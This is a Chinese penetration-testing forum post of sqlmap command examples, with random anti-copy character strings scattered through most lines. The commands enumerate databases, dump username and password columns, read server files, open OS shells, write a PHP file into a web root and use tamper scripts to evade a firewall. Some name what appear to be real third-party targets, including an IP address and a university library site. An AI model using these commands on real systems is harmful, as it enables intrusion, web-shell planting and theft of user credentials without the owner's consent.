中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap
& L) B0 C( K( Y* O5 [1 t: m
. A1 K/ L, u6 V5 o& Y" E& }update :::::>     in the folder   after  execute    following   order : svn update; e* |2 V5 F, |2 H9 I7 c
1 T- R) S, u2 J# _9 R' O4 [
sqlmap.py -r 1.txt --current-db
. F, Y2 i" O" J1 k. u7 {$ u" \; x; H" ?9 T
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”6 ^4 E: J: j1 [5 X* C
# }. R) R/ E8 V! k2 [5 _( k( |/ B
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 5 X+ \* b4 G% H0 x. [7 c! U
猜解数据库5 z, C7 I& C; f/ ?. t1 }# V( S" z
./sqlmap.py -u "injection-url" --dbs: O. Q$ J- {' V# K0 a  V" B
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
2 z4 O4 ^: X0 C. D$ G' G  u0 n4 E5 o, u2 ^
猜解表名
5 D% @- S& a( L./sqlmap.py -u "injection-url" -D database_name --tables
, N( J: `# a; O$ W
" E0 [7 [: M$ E/ q' w: usqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
  I7 J3 a, Q) ]; Dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" , {& B/ d  @$ N) p: g

2 {7 l+ h! J! O# }# W3 z$ V8 |8 t8 s0 Ksqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump# j% I' F8 J. y- l9 p

- r' T: O+ R2 z, [$ x1 s3 Csqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
% ]1 X0 m4 e! gsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"- W3 m7 r! `: }) F8 r8 x% K
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
8 k: r7 R7 Q! \& i1 H2 O+ T) _sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"/ K2 [; D+ F1 p. h
8 P1 V" x1 w" P
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"  d, L1 ~! c$ x$ \
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
; Q- B& |0 T4 g! n: osqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"1 ?8 o# D+ C8 m0 n9 b/ C
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 j6 J- _3 C' @+ O# @' i5 D8 |* tsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
& @/ L# U  n6 U, F
9 {- _3 Q3 M# h0 G, xsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
, o, s, ~: M/ w. C* u5 E3 k$ ]sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"! S$ t, k# x7 E3 Z8 w/ @

7 t& I/ p$ ]& E0 h; z6 ^" jsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
8 G! t$ T! e9 |$ c, v2 Y* e+ X猜解列名
9 |2 Z2 _9 @+ T9 e./sqlmap.py -u "injection-url" -D database_name -T table_name --columns' {0 d5 E" e- q( Q; E- F
2 G: S+ {6 D: r3 R* ?
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 0 C3 b0 _5 e0 {  W4 s4 y" V$ B
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
7 w, V4 Z- ?9 o( ~( B" psqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
2 h+ L: v8 L' ]/ v% ], `0 ^" B3 K, @1 `. t' l8 f, N/ s# a: U$ }
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"3 \1 |% }  g- [; q* h6 j& _- y
&submit=Go4 X6 Q! z5 r' j2 E; u
猜解值
& R1 E$ Z* H! T./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump/ u( Z8 m. W0 r' N9 `- V; S
========================================================
9 Q0 ]5 v$ |: j$ I搜索表名中包括mana字符的
9 Q4 |* D' `# t9 r% u$ j" W3 Y/sqlmap.py -u "injection-url" -T mana --search$ K6 q% q$ v% w- [& L* c( U
返回一个交互式sql shell+ D! g, E, L5 [' i- ]8 N. e8 b
/sqlmap.py -u "injection-url" --sql-shell
( k( [& Q* X! f- g' d读取指定文件(需权限)
" M' N) h+ H% A$ I( R* ]( f/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"( ~, L; f( E- B8 o
查看当前 用户 及 数据库
8 a7 J4 ]* |$ ]1 J; M7 e/sqlmap.py -u "injection-url" --current-user --current-db- P2 {" c" q5 N# W! T4 ?7 C
本地文件 写入 远程目标绝对路径
) e5 j+ Z) J$ k7 N" i2 l+ R/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径7 @1 k2 Q4 I/ N+ o; Z2 M
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" # b( q4 J  ~. A0 i; A4 C' a3 w7 ]) @

- `7 R: v+ U- ~7 U: Osqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
7 d. O& l& b3 v' U) l查看某用的权限& a4 U  s1 M# a( @) [* q+ T) U1 }
/sqlmap.py -u "injection-url" --privileges -U root
' n/ L9 ?) [4 G* m6 p$ N查看当前用户是否为dba
/ w3 j& }, \6 s( L" }+ f/sqlmap.py -u "injection-url" --is-dba
# b# K2 W4 z& X5 A, _* K读取所有数据库用户或指定数据库用户的密码
( ]4 @* s2 `/ ]6 ~8 }! gsqlmap.py -r 1.txt --users --passwords! R: @: b' \- M% |0 ]
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" ' a# g7 w$ u" |; r  g+ S$ h
# ]1 H2 F/ `& j, M
/sqlmap.py -u "injection-url" --passwords -U root) Y, D: n* k7 R! F& h0 l/ O
* E; f9 |+ T! t! y; u
--start&&--stop 与 --first&&--last 的区别) _4 V- Z7 u- q; j* h) m+ ]+ W. |
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
2 P' c2 H; r& U
- E/ ]0 ^5 ]7 X1 _* R从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt). s1 \% x3 ^( @5 v# Z1 ^# D) G
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
% J# g. X' b; Y1 E) E6 y' D9 q, U/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
" F5 P( e- u2 y) w9 @8 o
5 y' C) P3 D9 C4 v$ m- _. ?7 \执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)7 \( C% i& {5 N) q2 Y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
# d% V: D% l; w# ]4 T; E" Z6 ]/ m: \& ^& ^3 ^6 X' Q





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2